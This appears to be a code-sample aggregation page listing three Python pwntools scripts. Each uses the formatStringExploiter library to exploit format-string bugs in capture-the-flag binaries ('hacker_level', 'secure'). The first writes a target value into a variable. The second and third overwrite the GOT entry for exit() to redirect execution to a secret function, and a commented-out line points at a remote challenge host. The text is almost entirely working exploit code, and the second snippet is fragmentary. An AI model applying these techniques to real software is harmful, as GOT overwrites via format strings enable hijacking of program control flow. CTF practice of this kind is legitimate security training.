Пример #1
0
#!/usr/bin/env python

from formatStringExploiter.FormatString import FormatString
from pwn import *


def exec_fmt(s, echo=True):
    #  Open up pwntool process class to interact with application
    p = process("./hacker_level", buffer_fill_size=0xffff)
    # Go ahead and send our input
    p.sendline(s)
    # Throw out data that we know to be before our results
    p.recvuntil("Hello, ", drop=True)
    # We could do better here, but why? Just grab all the rest of the data.
    out = p.recvall()
    # For diagnostic reasons, we can print out the output
    if echo:
        print(out)
    # Since we're running this every time, close out the proc.
    p.close()
    return out


elf = ELF("./hacker_level")

fmtStr = FormatString(exec_fmt, elf=elf)

fmtStr.write_d(elf.symbols['level'], 0xCCC31337)
Пример #2
0

# print elf

print(hex(elf.got['exit']))
get_secret = 0x08048713
print hex(get_secret)


def exec_fmt(s):
  
    p = elf.process()
    # p =remote('problem1.tjctf.org',8008)

    p.recv()
    password = '******'
    p.sendline(password)
    p.recv()

    p.sendline(s)
    p.recvuntil('> ', drop=True)
    p.sendline(password)
    out =  p.recvuntil('\n\nTada!', drop=True)
    print p.recvall()
    return out

fmtStr = FormatString(exec_fmt,elf=elf, explore_stack=False)

# fmtStr.printStack()
fmtStr.write_d(elf.got['exit'], get_secret + 65537)
Пример #3
0
elf = ELF('./secure')

print(hex(elf.got['exit']))
get_secret = 0x08048713
print hex(get_secret)


def exec_fmt(s):

    p = elf.process()
    print("executing: " + repr(s))
    # p = remote('problem1.tjctf.org',8008)

    p.recv()
    password = '******'
    p.sendline(password)
    p.recv()

    p.sendline(s)
    p.recvuntil('> ', drop=True)
    p.sendline(password)
    out = p.recvuntil('\n\nTada!', drop=True)
    print p.recvall()
    return out


fmtStr = FormatString(exec_fmt, elf=elf, explore_stack=False)

print fmtStr.write_d(elf.got['exit'], get_secret + 0x10001)